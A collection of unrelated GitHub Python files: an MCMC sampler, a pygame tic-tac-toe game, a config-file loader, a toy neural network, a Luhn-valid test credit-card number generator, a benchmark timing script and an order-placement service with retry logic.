import dist\n\n\ndef sse(y, pred):\n    \"\"\"\n    SumSquaredError\n\n    Parameters\n    ----------\n\n    y : array-like\n        Data\n    pred : array-like\n        Prediction\n\n    Returns\n    -------\n    array\n\n\n    \"\"\"\n    return np.sum((y - pred)**2)\n\n\ndef mh_example(do_plot=True, verbose=False):\n    \"\"\"\n    Example use of MH for nonlinear fitting\n\n    Model:\n        Generative likelihood\n        Y = a*exp(-b*X) + N(0,sig^2)\n    Priors:\n        a ~ N(0,10^2)\n        b ~ N(0,10^2)\n        sig ~ Gamma(1,1)\n\n    Where:\n        X: array of regressors\n        a,b: parameters\n\n\n    Returns\n    -------\n    array (nsamples x nparams)\n\n    \"\"\"\n    np.random.seed(123)\n\n    x = np.linspace(0, 10, 100)\n    p = [1, 2, 0.05]\n    y = p[0] * np.exp(-p[1] * x)\n    y_noise = y + p[2] * np.random.randn(y.size)\n\n    # model\n    # a ~ N(0,10^2)\n    # b ~ N(0,10^2)\n    # sig ~ Gamma(1,1)\n    # y ~ a*exp(-b*x) + N(0,sig^2)\n\n    # minus loglik\n    def forward(p):\n        return p[0] * np.exp(-p[1] * x)\n\n    def loglik(p):\n        pred = forward(p)\n        return sse(y_noise, pred) / 2 / p[2]**2\n\n    # minus logpr (MH.fit expects energies, i.e. negative log-densities)\n    def logpr(p):\n        pr = dist.gauss_logpdf(p[0], loc=0, scale=10)\n        pr += dist.gauss_logpdf(p[1], loc=0, scale=10)\n        pr += dist.gamma_logpdf(p[2], shape=1, scale=1)\n        return -pr\n\n    p0 = [1, 1, 0.05]\n    mask = [1, 1, 0]\n    LB = [-np.inf, 0.0001, 0.0001]\n    UB = [np.inf, np.inf, np.inf]\n    mh = MH(loglik, logpr)\n    samples = mh.fit(p0, mask=mask, verbose=verbose, LB=LB, UB=UB)\n\n    if do_plot:\n        mh.plot_samples(samples, labels=['a', 'b', 'sig'])\n        mh.plot_fit(forward, x, y_noise, samples.mean(axis=0))\n\n    return samples\n\n\ndef test_mh_example():\n    samples = mh_example(do_plot=False)\n    assert 0 < samples.mean(axis=0)[0] < 2\n    assert 0 < samples.mean(axis=0)[1] < 3\n\n\ndef plot_samples(samples, labels=None, plot_type='matrix'):\n    \"\"\"\n    Plot summary of the sampling\n\n    samples : array-like (num_samples x num_params)\n    labels : list\n    plot_type : one of: 'matrix', 'vector', 'corr'\n    \"\"\"\n\n    import seaborn as sns\n    import pandas as pd\n    import matplotlib.pyplot as plt\n\n    plt.figure()\n    sns.set()\n\n    if plot_type == 'matrix':\n        df = pd.DataFrame(data=samples, columns=labels)\n        g = sns.PairGrid(df)\n        g.map_diag(plt.hist)\n        g.map_offdiag(sns.kdeplot)\n    elif plot_type == 'vector':\n        mean = np.mean(samples, axis=0)\n\n        std_pos = np.sqrt(np.sum(np.maximum(0, samples - mean)**2, axis=0) / np.sum((samples - mean) > 0, axis=0))\n        std_neg = np.sqrt(np.sum(np.maximum(0, mean - samples)**2, axis=0) / np.sum((mean - samples) > 0, axis=0))\n\n        fig, ax = plt.subplots(1)\n        plt.errorbar(y=range(samples.shape[1]),\n                     x=mean,\n                     xerr=[std_neg, std_pos], fmt='o')\n        if labels is not None:\n            ax.set_yticks(range(len(labels)))\n            ax.set_yticklabels(labels=labels)\n    elif plot_type == 'corr':\n        df = pd.DataFrame(data=samples, columns=labels)\n        corr = df.corr()\n        # Generate a mask for the upper triangle\n        mask = np.zeros_like(corr, dtype=bool)\n        mask[np.triu_indices_from(mask)] = True\n        # Set up the matplotlib figure\n        f, ax = plt.subplots(figsize=(11, 9))\n        # Generate a custom diverging colormap\n        cmap = sns.diverging_palette(220, 10, as_cmap=True)\n        # Draw the heatmap with the mask and correct aspect ratio\n        sns.heatmap(corr, mask=mask, cmap=cmap, center=0, annot=True,\n                    square=True, linewidths=.5, cbar_kws={\"shrink\": .5}, annot_kws={\"size\": 8}, fmt='.1g')\n\n    else:\n        raise Exception('Unknown plot_type')\n\n\ndef plot_fit(forward, x, y, params):\n    \"\"\"\n    Plot data fit\n\n    forward : function\n    data : array\n    params : array\n    \"\"\"\n    import seaborn as sns\n    import matplotlib.pyplot as plt\n\n    sns.set()\n    plt.figure()\n    sns.scatterplot(x, y)\n    sns.lineplot(x, 
forward(params))\n\n\nclass MH:\n\n def __init__(self, loglik, logpr, burnin=1000, sampleevery=10, njumps=5000, update=20):\n \"\"\"\n Initialise MH object\n\n Parameters\n ----------\n\n loglik: function\n Maps parameters to minus log-likelihood\n logpr: function\n Maps parameters to minus log-prior\n burnin: int\n Number of iterations before actual sampling starts\n sampleevery: int\n Sampling rate\n njumps: int\n Number of sampling iterations\n update: int\n Rate of update of proposal distribution\n\n\n \"\"\"\n\n self.burnin = burnin\n self.sampleevery = sampleevery\n self.njumps = njumps\n self.update = update\n self.loglik = loglik\n self.logpr = logpr\n\n def bounds_from_list(self, n, bounds):\n \"\"\"\n Get bounds from list to two lists\n Args:\n n: num params\n bounds: sciipy-optimize-style bounds\n\n Returns:\n numpy 1D array (Lower bounds)\n numpy 1D array (Upper bounds)\n \"\"\"\n LB = -np.inf * np.ones(n)\n UB = np.inf * np.ones(n)\n if bounds is None:\n return LB, UB\n if not isinstance(bounds, list):\n raise(Exception('bounds must either be a list or None'))\n for i, b in enumerate(bounds):\n LB[i] = b[0] if b[0] is not None else -np.inf\n UB[i] = b[1] if b[1] is not None else np.inf\n return LB, UB\n\n def fit(self, p0, mask=None, verbose=False, LB=None, UB=None):\n \"\"\"\n Run Metropolis Hastings algorithm to fit data\n\n Parameters\n ----------\n\n p0 : array-like\n Initial values for the parameters to be fitted\n mask : array-like\n Mask for fixed parameters. Has the same size as p0, contains zero for fixed parameters\n verbose : boolean\n LB: array-like\n Lower bounds on parameters\n UB array-like\n Upper bounds on parameters\n\n Returns\n -------\n array\n Samples from the posterior distribution (nsamples X nparams)\n\n \"\"\"\n # Convert to numpy array\n p0 = np.array(p0, dtype=float)\n\n if verbose:\n print(\"Initialisation\")\n\n # Bounds\n LB = np.full(p0.size, -np.inf) if LB is None else LB\n UB = np.full(p0.size, np.inf) if UB is None else UB\n\n for idx in range(p0.size):\n if not LB[idx] <= p0[idx] <= UB[idx]:\n raise Exception(\"Initial values outside of range!!!\")\n\n # Initialise p,e,acc,rej,prop\n p = np.array(p0, dtype=float)\n e = self.loglik(p) + self.logpr(p)\n acc = np.zeros(p.size)\n rej = np.zeros(p.size)\n prop = np.abs(p0) / 10 # np.ones(p.size)\n prop[prop == 0] = 1\n\n samples = np.zeros((self.njumps + self.burnin, p.size))\n\n # Mask\n if mask is None:\n mask = np.ones(p0.size)\n\n # Main loop\n maxiter = self.burnin + self.njumps\n if verbose:\n print(\"Begin MH sampling\")\n for iter in range(maxiter):\n if verbose:\n print(\".... Iter {}/{}\".format(iter, maxiter))\n # Loop through params\n for idx in range(p.size):\n if mask[idx] != 0:\n oldp = p[idx]\n p[idx] = p[idx] + np.random.randn() * prop[idx]\n if not LB[idx] <= p[idx] <= UB[idx]:\n p[idx] = oldp\n rej[idx] += 1\n else:\n olde = e\n e = self.loglik(p) + self.logpr(p)\n if np.exp(olde - e) > np.random.rand():\n acc[idx] += 1\n else:\n p[idx] = oldp\n rej[idx] += 1\n e = olde\n # end loop over params\n samples[iter, :] = p\n if iter % self.update == 0:\n if verbose:\n print(\".... 
>>> Update Proposal \")\n prop *= np.sqrt((1 + acc) / (1 + rej))\n acc *= 0\n rej *= 0\n\n samples = samples[self.burnin::self.sampleevery]\n return samples\n\n def marglik_HM(self, samples):\n \"\"\"\n Approximate Marginal Likelihood using Harmonic Mean estimator\n\n Parameters\n ----------\n samples : array-like\n \"\"\"\n LL = np.zeros(samples.shape[0])\n for i in range(samples.shape[0]):\n LL[i] = self.loglik(samples[i, :])\n\n M = LL.max()\n ML = np.log(1 / np.sum(np.exp(LL - M))) - M - np.log(samples.shape[0])\n\n return ML\n\n def marglik_Laplace(self, samples):\n \"\"\"\n Approximate Marginal Likelihood using Laplace approx\n\n Parameters\n ----------\n samples : array-like\n \"\"\"\n mean = samples.mean(axis=0)\n detcov = np.linalg.det(np.cov(samples.T))\n\n LL = -self.loglik(mean)\n LP = -self.logpr(mean)\n\n ML = LL + LP + .5 * np.log(detcov) + samples.shape[1] / 2.0 * np.log(np.pi)\n\n return ML\n","repo_name":"wtclarke/fsl_mrs","sub_path":"fsl_mrs/utils/stats/mh.py","file_name":"mh.py","file_ext":"py","file_size_in_byte":9208,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"22667531316","text":"# Pygame template for new games\n\nimport pygame as pg\nimport random\nfrom os import path\n\n#Pygame settings\nWIDTH = 480\nHEIGHT = 600\nFPS = 60\n\n\nSPRITESHEET = \"\"\n\n#Layers\n\n#Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nTRANSGRAY = (200, 200, 200, 128)\n\n\nRED = (255, 0, 0)\nDARK_RED = (200, 0, 0)\n\nYELLOW = (255, 255, 0)\nDARK_YELLOW = (200, 200, 0)\n\nGREEN = (0, 255, 0)\nDARK_GREEN = (0, 200, 0)\n\nBLUE = (0, 0, 255)\nCYAN = (0, 255, 255)\nPURPLE = (255, 0, 255)\nDARKPURPLE = (51, 0, 51)\nBLUEGREEN = (162, 247, 225)\nBROWN = (51, 25, 0)\nGRAY = (128, 128, 128)\nLT_GRAY = (211, 211, 211)\n\nBG_COLOR = BLUEGREEN\n\nclass Game:\n\n def __init__(self):\n # initializes game window\n pg.init() # starts the game\n pg.mixer.init() # used for sound and music\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(\"TicTacToe vs AI\")\n self.clock = pg.time.Clock()\n self.running = True\n self.load_data()\n\n def load_data(self):\n self.dir = path.dirname(__file__)\n img_dir = path.join(self.dir, 'img')\n self.font_name = path.join(img_dir, 'Soft Marshmallow.otf')\n\n def new(self):\n self.bWIDTH = 100\n self.bHEIGHT = 100\n\n self.screen.fill(WHITE)\n #pg.draw.rect(self.screen, RED, [87, 148, 310, 310])\n\n pg.draw.line(self.screen, BLACK, (189, HEIGHT / 2 - 152), (189, HEIGHT / 2 + 157), 5)\n pg.draw.line(self.screen, BLACK, (294, HEIGHT / 2 - 152), (294, HEIGHT / 2 + 157), 5)\n\n pg.draw.line(self.screen, BLACK, (WIDTH / 2 - 153, 250), (WIDTH / 2 + 157, 250), 5)\n pg.draw.line(self.screen, BLACK, (WIDTH / 2 - 153, 355), (WIDTH / 2 + 157, 355), 5)\n\n pg.draw.rect(self.screen, WHITE, [87, 148, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [87, 253, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [87, 358, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [192, 148, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [192, 253, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [192, 358, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [297, 148, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [297, 253, self.bWIDTH, self.bHEIGHT])\n pg.draw.rect(self.screen, WHITE, [297, 358, self.bWIDTH, self.bHEIGHT])\n\n\n pg.display.flip()\n self.run()\n\n def run(self):\n self.playing = True\n 
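# the human player moves first; a successful \"Place\" click inside events() flips this flag to hand the turn over\n        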
self.player_turn = True\n while self.playing:\n self.clock.tick(FPS)\n self.events()\n\n def update(self):\n pass\n\n def events(self):\n\n for event in pg.event.get():\n if event.type == pg.QUIT:\n if self.playing:\n self.playing = False\n self.running = False\n\n if self.player_turn == True:\n self.button(\"\", 87, 148, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 87, 253, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 87, 358, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 192, 148, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 192, 253, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 192, 358, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 297, 148, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 297, 253, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n self.button(\"\", 297, 358, 100, 100, WHITE, TRANSGRAY, 22, \"Place\")\n\n pg.display.flip()\n\n def button(self, msg, x, y, w, h, ic, ac, size, action=None):\n\n mouse = pg.mouse.get_pos()\n click = pg.mouse.get_pressed()\n\n if x + 100 > mouse[0] > x and y + 100 > mouse[1] > y:\n pg.draw.rect(self.screen, ac, (x, y, w, h))\n if click[0] == 1 and action != None:\n if action == \"Place\":\n print(\"h\")\n self.player_turn = False\n pg.draw.rect(self.screen, ic, (x, y, w, h))\n else:\n pg.draw.rect(self.screen, ic, (x, y, w, h))\n\n self.text(msg, size, BLACK, (x + (w / 2)), (y + (h * 1 / 3)))\n\n def text(self, text, size, color, x, y):\n font = pg.font.Font(self.font_name, size)\n text_surface = font.render(text, True, color)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x, y)\n self.screen.blit(text_surface, text_rect)\n\n def hover(self):\n while self.running:\n self.button(\"\", 87, 148, 100, 100, GREEN, RED, 22, \"Place\")\n\n pg.display.flip()\n\ng = Game()\nwhile g.running:\n g.new()\n #g.show_go_screen()\n\npg.quit()\n","repo_name":"DominicFernandez/School-Projects","sub_path":"TicTacToe.py","file_name":"TicTacToe.py","file_ext":"py","file_size_in_byte":4777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5881683842","text":"from itertools import product\nimport json\nfrom os import path, getcwd\n# \"FileNotFoundError\" is a Py 3 thing. If we're in Py 2, we mimic it with a lambda expression.\ntry:\n FileNotFoundError\nexcept NameError:\n from errno import ENOENT\n FileNotFoundError = lambda x: IOError(ENOENT, x)\n\nimport yaml\n\n\nCONFIG_DIRS = [\n getcwd(),\n '~',\n path.join('~', 'twitter'),\n]\n\nCONFIG_BASES = [\n 'twitter.yml',\n 'twitter.yaml',\n 'twitter.json'\n]\n\n\ndef configure(screen_name=None, config_file=None, app=None, **kwargs):\n \"\"\"\n Set up a config dictionary using a bots.yaml config file and optional keyword args.\n\n Args:\n screen_name (str): screen_name of user to search for in config file\n config_file (str): Path to read for the config file\n app (str): Name of the app to look for in the config file. Defaults to the one set in users.{screen_name}.\n default_directories (str): Directories to read for the bots.yaml/json file. Defaults to CONFIG_DIRS.\n default_bases (str): File names to look for in the directories. 
Defaults to CONFIG_BASES.\n \"\"\"\n # Use passed config file, or look for it in the default path.\n # Super-optionally, accept a different place to look for the file\n dirs = kwargs.pop('default_directories', None)\n bases = kwargs.pop('default_bases', None)\n file_config = {}\n if config_file is not False:\n config_file = find_file(config_file, dirs, bases)\n file_config = parse(config_file)\n\n # config and keys dicts\n # Pull non-authentication settings from the file.\n # Kwargs, user, app, and general settings are included, in that order of preference\n # Exclude apps and users sections from config\n config = {k: v for k, v in file_config.items() if k not in ('apps', 'users')}\n\n user_conf = file_config.get('users', {}).get(screen_name, {})\n app = app or user_conf.get('app')\n app_conf = file_config.get('apps', {}).get(app, {})\n\n # Pull user and app data from the file\n config.update(app_conf)\n config.update(user_conf)\n\n # kwargs take precendence over config file\n config.update({k: v for k, v in kwargs.items() if v is not None})\n\n return config\n\n\ndef parse(file_path):\n '''Parse a YAML or JSON file.'''\n\n _, ext = path.splitext(file_path)\n\n if ext in ('.yaml', '.yml'):\n func = yaml.safe_load\n\n elif ext == '.json':\n func = json.load\n\n else:\n raise ValueError(\"Unrecognized config file type %s\" % ext)\n\n with open(file_path, 'r') as f:\n return func(f)\n\n\ndef find_file(config_file=None, default_directories=None, default_bases=None):\n '''Search for a config file in a list of files.'''\n\n if config_file:\n if path.exists(path.expanduser(config_file)):\n return config_file\n else:\n raise FileNotFoundError('Config file not found: {}'.format(config_file))\n\n dirs = default_directories or CONFIG_DIRS\n dirs = [getcwd()] + dirs\n\n bases = default_bases or CONFIG_BASES\n\n for directory, base in product(dirs, bases):\n filepath = path.expanduser(path.join(directory, base))\n if path.exists(filepath):\n return filepath\n\n raise FileNotFoundError('Config file not found in {}'.format(dirs))\n\ndef dump(contents, file_path):\n _, ext = path.splitext(file_path)\n\n if ext in ('.yaml', '.yml'):\n func = yaml.dump\n kwargs = {'canonical': False, 'default_flow_style': False, 'indent': 4}\n\n elif ext == '.json':\n func = json.dump\n kwargs = {'sort_keys': True, 'indent': 4}\n\n else:\n raise ValueError(\"Unrecognized config file type %s\" % ext)\n\n with open(file_path, 'w') as f:\n func(contents, f, **kwargs)\n","repo_name":"kenshin579/app-quotes","sub_path":"scripts/confighelper.py","file_name":"confighelper.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"7108891556","text":"import numpy\n\n# Squish numbers into the range 0-1 \n# -ve inputs close to 0\n# +ve inputs close to 1\n# input: x: vector or numpy array\ndef sigmoid(x):\n return 1.0/(1+ numpy.exp(-x))\n\n# Look into ReLU Rectified Linear Unit\n# This works well for deep networks\n# This has mostly replaced use of sigmoid\n\ndef sigmoid_derivative(x):\n return x * (1.0 - x)\n\nclass neural_network:\n def __init__(self, x, y):\n self.input = x\n self.weights_1 = numpy.random.rand(self.input.shape[1], 4)\n self.weights_2 = numpy.random.rand(4, 1)\n self.y = y\n self.output = numpy.zeros(y.shape)\n\n\n def feed_forward(self):\n self.layer_1 = sigmoid(numpy.dot(self.input, self.weights_1))\n self.output = sigmoid(numpy.dot(self.layer_1, self.weights_2))\n\n\n def back_propagation(self):\n # application of the 
chain rule to find derivative of the loss function with respect to weights2 and weights1\n        weights_2 = numpy.dot(self.layer_1.T, (2*(self.y - self.output) * sigmoid_derivative(self.output)))\n        weights_1 = numpy.dot(self.input.T, (numpy.dot(2*(self.y - self.output) * sigmoid_derivative(self.output), self.weights_2.T) * sigmoid_derivative(self.layer_1)))\n    \n    \n        # update the weights with the derivative (slope) of the loss function\n        self.weights_1 += weights_1\n        self.weights_2 += weights_2\n\n\nif __name__ == \"__main__\":\n    X = numpy.array([[0,0,1],\n                  [0,1,1],\n                  [1,0,1],\n                  [1,1,1]])\n\n    X_1 = numpy.array([[0,0,1,1],\n                  [0,1,1,1],\n                  [1,0,1,1],\n                  [1,1,1,0]])\n    y = numpy.array([[0],[1],[1],[0]])\n    nn = neural_network(X_1,y)\n\n    for i in range(1500):\n        nn.feed_forward()\n        nn.back_propagation()\n\n    print(nn.output)","repo_name":"domRowan/cautious-barnacle","sub_path":"cautious-barnacle/neural_network/basic_neural_network.py","file_name":"basic_neural_network.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6114576092","text":"import sys\r\nimport random\r\nimport array\r\n\r\nccType={\"mc\":0, \"mastercard\":0, \"amex\":1, \"visa\":2, \"discover\":3, \"disc\":3}\r\nccLen={\"MC\":16, \"AMEX\":15, \"DISC\":16, \"VISA\":16}\r\nccEnum={0:\"MC\", 1:\"AMEX\", 2:\"VISA\", 3:\"DISC\"}\r\n\r\ndef fillRawDigits(len):\r\n    for i in range(0, len-1):\r\n        cardNumber.append(random.randint(0,9))\r\n    return None\r\n\r\ndef fixRawDigits(sz):\r\n    checkDigit=[0, 9, 8, 7, 6, 5, 4, 3, 2, 1]\r\n    count=0\r\n    sum=0\r\n    for i in cardNumber:\r\n        if((count&1)==(sz&1)):\r\n            i=i*2\r\n            if (i>9):\r\n                i=i-9\r\n        sum=sum+i\r\n        count=count+1\r\n    \r\n    cardNumber.append(checkDigit[sum%10])\r\n    return None\r\n\r\ndef makeMc():\r\n    len=ccLen[\"MC\"]-2\r\n    cardNumber.append(5)\r\n    cardNumber.append(random.randint(1,5))\r\n    return len\r\n\r\ndef makeDisc():\r\n    len=ccLen[\"DISC\"]-4\r\n    cardNumber.append(6)\r\n    cardNumber.append(0)\r\n    cardNumber.append(1)\r\n    cardNumber.append(1)\r\n    return len\r\n\r\ndef makeVisa():\r\n    len=ccLen[\"VISA\"]-1\r\n    cardNumber.append(4)\r\n    return len\r\n\r\ndef makeAmex():\r\n    len=ccLen[\"AMEX\"]-2\r\n    #Amex numbers start with 34 or 37\r\n    cardNumber.append(3)\r\n    cardNumber.append(random.choice([4, 7]))\r\n    return len\r\n\r\nccFunc={0:makeMc, 1:makeAmex, 2:makeVisa, 3:makeDisc}\r\ncardNumber=[]\r\n\r\ndef makeCC(ccName):\r\n    if (len(ccName)==0):\r\n        raise Exception('ccName', 'isNull')\r\n    \r\n    try:\r\n        ccTypeEnum=ccType[ccName]\r\n    except KeyError:\r\n        print(\"ccName must be one of: \")\r\n        print(list(ccType.keys()))\r\n        return None\r\n\r\n    random.seed()\r\n    #invoke fn pointer from hash\r\n    sz=ccFunc[ccTypeEnum]()\r\n    fillRawDigits(sz)\r\n    fixRawDigits(ccLen[ccEnum[ccTypeEnum]])\r\n    \r\n    for i in cardNumber:\r\n        sys.stdout.write(str(i))\r\n    \r\n    return None\r\n\r\nif __name__=='__main__':\r\n    if len(sys.argv)!=2:\r\n        print(\"usage: CreditCardMaker <type>\\ntypes are: \")\r\n        print(list(ccType.keys()))\r\n        quit()\r\n\r\n    jnk, ccName=sys.argv\r\n    makeCC(ccName)\r\n    ","repo_name":"abawany/ab-code-samples","sub_path":"CreditCardMaker.py","file_name":"CreditCardMaker.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13720351905","text":"import os \r\nimport time\r\n\r\nloopNums = [1, 10, 20, 30, 40]\r\neachLoop = 1\r\n\r\nfor num in loopNums:\r\n    totalTime = 0\r\n    f = open(str(num)+\".txt\", \"w\")\r\n    f.write(\"8192 8192 4 4 \"+ str(num))\r\n    
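# each input file holds a single line read by seq-algo.exe from stdin: the 8192x8192 grid size, two fixed parameters, and the loop count\r\n    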
f.close()\r\n for i in range(eachLoop):\r\n start = time.time()\r\n os.system(\"seq-algo.exe <\" + str(num) + \".txt\")\r\n end = time.time()\r\n \r\n totalTime+= (end-start)\r\n avTime = totalTime\r\n print(\"Average Time of 8192x8192 grid for \" + str(num) + \" loop: \" + str(avTime))","repo_name":"Kerim-13/Homeworks","sub_path":"CENG478-Project/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17344478742","text":"from PyQt5.QtCore import pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import QWizard, QMessageBox, QFileDialog, QDialog, QInputDialog, QAbstractItemView, QVBoxLayout, \\\n QWidget\n\nfrom mcjsontool.resource import fileloaders\nfrom mcjsontool.resource.workspace import Workspace\nfrom .workspacewizard_ui import Ui_Wizard\n\n\nclass WorkspaceWizard(QWizard, Ui_Wizard):\n newWorkspaceEmitted = pyqtSignal(Workspace, str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n self.setupUi(self)\n self.workspaceObject = None\n\n self.locationBrowse.clicked.connect(self.browseButtonCB)\n self.edit_widgets = []\n\n self.settingsList.setSelectionMode(QAbstractItemView.SingleSelection)\n self.settingsList.currentRowChanged.connect(self.newSelection)\n self.addButton.clicked.connect(self.addEditWidget)\n self.removeButton.clicked.connect(self.removeEditWidget)\n self.finished.connect(self.on_finish)\n self.selected = None\n\n @pyqtSlot()\n def addEditWidget(self):\n list_ = [x.__name__ for x in fileloaders.fileloaders]\n user_select, ok = QInputDialog.getItem(self, \"Select source type\", \"Please select a source type from the options below\", list_, editable=False)\n if ok:\n i = list_.index(user_select)\n edit_widget = fileloaders.fileloaders[i].create_edit_widget(self.settingsBox)\n self.edit_widgets.append(edit_widget)\n self.update_list()\n\n @pyqtSlot(int)\n def newSelection(self, x):\n if 0 <= x < len(self.edit_widgets):\n if self.settingsBox.layout() is None:\n layout = QVBoxLayout()\n layout.addWidget(self.edit_widgets[x])\n self.selected = self.edit_widgets[x]\n self.settingsBox.setLayout(layout)\n else:\n self.settingsBox.layout().removeWidget(self.selected)\n self.selected: QWidget\n self.selected.setParent(self)\n self.settingsBox.layout().addWidget(self.edit_widgets[x])\n self.selected = self.edit_widgets[x]\n self.update()\n\n @pyqtSlot()\n def removeEditWidget(self):\n if self.settingsList.selectedIndexes():\n i = self.settingsList.selectedIndexes()[0].row()\n del self.edit_widgets[i]\n self.update_list()\n\n def update_list(self):\n self.settingsList.clear()\n for i in self.edit_widgets:\n self.settingsList.addItem(str(i))\n\n @pyqtSlot()\n def browseButtonCB(self):\n filepath, *a = QFileDialog.getSaveFileName(parent=self, caption=\"Select path to save workspace\", filter=\"Workspaces (*.mcjtwp)\")\n if filepath:\n self.locationEdit.setText(filepath)\n\n @pyqtSlot(int)\n def on_finish(self, result):\n if result == QDialog.Rejected:\n return\n else:\n workspace = Workspace(self.nameEdit.text(), Workspace.EDITMODE_EDIT if self.editMode.isChecked() else Workspace.EDITMODE_RESOURCEPACK)\n for i in self.edit_widgets:\n workspace.providers.append(i.create_provider())\n workspace.refresh_file_cache(wait_for_complete=False)\n workspace.save_to_file(self.locationEdit.text())\n self.newWorkspaceEmitted.emit(workspace, self.locationEdit.text())\n\n def validateCurrentPage(self):\n if self.currentPage() == self.nameTypePage:\n if 
self.nameEdit.text() != \"\" and self.locationEdit.text() != \"\":\n                return True\n            else:\n                # noinspection PyCallByClass\n                QMessageBox.critical(self, \"Error\", \"Please fill in all fields.\")\n                return False\n        elif self.currentPage() == self.sourcesPage:\n            if all((x.is_valid() for x in self.edit_widgets)):\n                return True\n            else:\n                QMessageBox.critical(self, \"Error\", \"Please fill in all fields (make sure you check all sources)\")\n                return False\n        return True\n","repo_name":"mincrmatt12/MCJsonTool","sub_path":"mcjsontool/ui/workspace/workspacewizard.py","file_name":"workspacewizard.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73333314113","text":"def calcula_percent(valor, porcentagem):\r\n    return valor * (porcentagem/100)\r\n\r\n#Part a)\r\ndef adicionar_taxas(vlr_base):\r\n    total = vlr_base\r\n    total += calcula_percent(vlr_base, 50) #Add import tax (50%)\r\n    imposto_circulacao = calcula_percent(total, 3) #Circulation tax (3%)\r\n    total += imposto_circulacao #Add circulation tax\r\n    #Add delivery fee\r\n    total += calcula_percent(vlr_base, 10) + calcula_percent(imposto_circulacao, 2)\r\n\r\n    return total\r\n\r\n#Part b)\r\ndef dar_desconto(codigo):\r\n    xx = codigo // 100\r\n    yy = codigo % 100\r\n\r\n    preco_basico = xx * 15 + yy\r\n    percentual_desconto = yy\r\n\r\n    total = preco_basico - calcula_percent(preco_basico, percentual_desconto)\r\n    \r\n    return total\r\n\r\ndef main():\r\n    print(\"Part a)\")\r\n    vlr_produto = float(input(\"Enter the product price: \"))\r\n    print(\"Price + taxes:\", adicionar_taxas(vlr_produto), end=\"\\n\"*2)\r\n    \r\n    print(\"Part b)\")\r\n    codigo_produto = int(input(\"Enter the product code (4 digits): \"))\r\n    print(\"Promotional price:\", dar_desconto(codigo_produto))\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"Lima001/BCC-Algoritmos","sub_path":"Lista-AER-Alg-19/GEL-AER-Alg-19-Ex-8.py","file_name":"GEL-AER-Alg-19-Ex-8.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29859776245","text":"import logging\nimport time\n\nfrom fastapi import BackgroundTasks\n\nimport stock_exchange\nfrom models import CreateOrderModel, CreateOrderResponseModel, Order, OrderStatus\nfrom orders_dao import dao\nfrom stock_exchange import OrderPlacementError\n\nPLACE_ORDER_MAX_RETRIES = 5\n\nlogger = logging.getLogger(__name__)\n\n\ndef create_and_place_order(order_request: CreateOrderModel, background_tasks: BackgroundTasks) \\\n        -> CreateOrderResponseModel:\n    order = order_request.to_order_entity()\n    order = dao.create_order(order)\n    try:\n        stock_exchange.place_order(order)\n        order = dao.update_order_status(order.id, OrderStatus.SUCCESS)\n    except OrderPlacementError:\n        logger.warning(f\"Error while placing order with id {order.id}. Order placement will be retried\")\n        background_tasks.add_task(retry_order_placement, order)\n    return order\n\n\ndef retry_order_placement(order: Order):\n    for i in range(PLACE_ORDER_MAX_RETRIES):\n        try:\n            time.sleep(2)\n            stock_exchange.place_order(order)\n            order = dao.update_order_status(order.id, OrderStatus.SUCCESS)\n            return\n        except OrderPlacementError:\n            logger.warning(f\"Order placement for id {order.id} failed on retry attempt {i+1}\")\n    logger.error(f\"Order placement for id {order.id} failed even after {PLACE_ORDER_MAX_RETRIES} attempts. 
